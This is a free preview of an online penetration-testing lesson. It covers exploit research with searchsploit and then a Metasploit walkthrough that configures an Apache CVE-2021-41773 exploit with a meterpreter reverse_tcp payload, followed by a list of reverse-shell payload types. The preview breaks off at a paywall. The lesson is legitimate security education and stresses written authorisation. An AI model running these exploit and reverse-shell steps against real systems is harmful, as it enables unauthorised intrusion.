You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
Exploitation is where theory meets practice — you take the vulnerabilities identified during scanning and enumeration and attempt to gain unauthorised access to demonstrate real-world impact. This lesson covers the Metasploit framework, exploit selection, payloads, shells, and post-exploitation basics.
Critical: Exploitation must only be performed on systems you have written authorisation to test. Accidentally exploiting out-of-scope systems can have legal consequences and cause real damage.
graph TD
A["1. Identify vulnerability"] --> B["2. Research exploit (CVE, PoC, etc.)"]
B --> C["3. Select/configure exploit + payload"]
C --> D["4. Execute exploit (verify scope!)"]
D --> E["5. Establish access (shell/session)"]
E --> F["6. Document and move to post-exploitation"]
Before writing your own exploits, search existing databases:
| Resource | URL | Description |
|---|---|---|
| Exploit-DB | exploit-db.com | Curated archive of public exploits |
| CVE Details | cvedetails.com | CVE database with CVSS scores |
| NVD | nvd.nist.gov | National Vulnerability Database |
| Packet Storm | packetstormsecurity.com | Security tools and exploits |
| GitHub PoCs | github.com (search CVE-YYYY) | Proof-of-concept repositories |
# Search Exploit-DB from the command line (Kali)
searchsploit apache 2.4.49
searchsploit -m 50383 # mirror (download) an exploit
Metasploit is the most widely used exploitation framework. It provides a structured approach to finding, configuring, and executing exploits.
| Module | Purpose |
|---|---|
| Exploits | Code that triggers the vulnerability |
| Payloads | Code that runs after exploitation |
| Auxiliary | Scanners, fuzzers, brute-forcers |
| Post | Post-exploitation modules |
| Encoders | Obfuscate payloads to evade detection |
# Start the Metasploit console
msfconsole
# Search for an exploit
msf6 > search type:exploit apache
msf6 > search cve:2021-41773
# Select an exploit
msf6 > use exploit/multi/http/apache_normalize_path_rce
# View required options
msf6 exploit(...) > show options
# Set target and payload options
msf6 exploit(...) > set RHOSTS 192.168.1.100
msf6 exploit(...) > set RPORT 443
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444
# Select a payload
msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
# Run the exploit
msf6 exploit(...) > exploit
A payload is the code that executes on the target after successful exploitation.
| Type | Description | Example |
|---|---|---|
| Singles | Self-contained, all in one | linux/x64/exec |
| Stagers | Small initial payload that downloads the stage | windows/x64/meterpreter/reverse_tcp |
| Stages | Downloaded by stager, provides full functionality | Meterpreter, shell |
# List available payloads
msf6 > show payloads
# Filter by platform
msf6 > show payloads | grep windows/x64
# Common choices:
# windows/x64/meterpreter/reverse_tcp — most feature-rich on Windows
# linux/x64/meterpreter/reverse_tcp — most feature-rich on Linux
# cmd/unix/reverse_bash — simple bash reverse shell
# php/meterpreter/reverse_tcp — for PHP web apps
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.